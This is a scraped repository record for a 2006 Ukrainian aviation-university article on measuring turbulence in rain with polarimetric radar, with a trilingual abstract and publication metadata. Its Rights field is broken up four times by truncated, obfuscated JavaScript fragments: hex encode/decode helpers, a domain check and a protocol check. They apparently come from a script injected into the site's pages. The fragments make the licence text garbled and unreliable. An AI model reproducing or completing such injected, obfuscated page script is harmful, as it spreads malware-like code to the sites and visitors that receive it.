Record Details

Evaluation of atmospheric intensity turbulent by polarimetric radar

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title Evaluation of atmospheric intensity turbulent by polarimetric radar
Oценка интенсивности атмосферной турбулентности с помощью поляриметрического радиолокатора
ОЦІНКА ІНТЕНСИВНОСТІ АТМОСФЕРНОЇ ТУРБУЛЕНТНОСТІ ЗА ДОПОМОГОЮ ПОЛЯРИМЕТРИЧНОГО РАДІОЛОКАТОРА
 
Creator Авер’янова, Ю.А.; НАУ, кафедра аеронавігаційних систем
Аверьянов, A.А.; НАУ, кафедра аеронавігаційних систем
Яновський, Ф.Й.; НАУ, кафедра аеронавігаційних систем
 
Subject


 
Description  The approach to retrieve information on turbulence intensity in liquid precipitation with polarimetric spectrum parameters is proposed. Turbulence is considered as random process. Drops are considered as factors that provide polarization spectrum appearance. Polarimetric spectrum of received signal depends on hydrometeor aerodynamics that is described with transient characteristic. The calculation results confirm the possibility to use the polarimetric spectrum parameters for turbulence characteristic.  
 Предложен подход получения информации об интенсивности турбулентности в жидких осадках из параметрами поляризационного спектра. Турбулентность рассматривается как случайный процесс, капли - как фактор, что обуславливает образование поляризационного спектра. Поляризационный спектр отраженного сигнала зависит от аэродинамических свойств гидрометеоров, которые описываются их переходными характеристиками. Результаты расчета подтверждают возможность использования параметров поляризационного спектра для характеристики турбулентности.
 Запропоновано підхід одержання інформації про інтенсивність турбулентності в рідких опадах з використанням параметрів поляризаційного спектра. Турбулентність  розглядається як випадковий процес, краплі – як фактор, що зумовлює утворення поляризаційного спектра. Поляризаційний спектр відбитого сигналу залежить від аеродинамічних властивостей гідрометеорів, які описуються їхніми перехідними характеристиками. Результати розрахунку підтверджують можливість використання параметрів поляризаційного спектра для характеристики турбулентності.
 
Publisher National Aviation University
 
Contributor


 
Date 2006-02-01
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/1316
10.18372/2306-1472.28.1316
 
Source Proceedings of the National Aviation University; Том 28, № 2 (2006); 38-40
Вестник Национального авиационного университета; Том 28, № 2 (2006); 38-40
Вісник Національного Авіаційного Університету; Том 28, № 2 (2006); 38-40
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ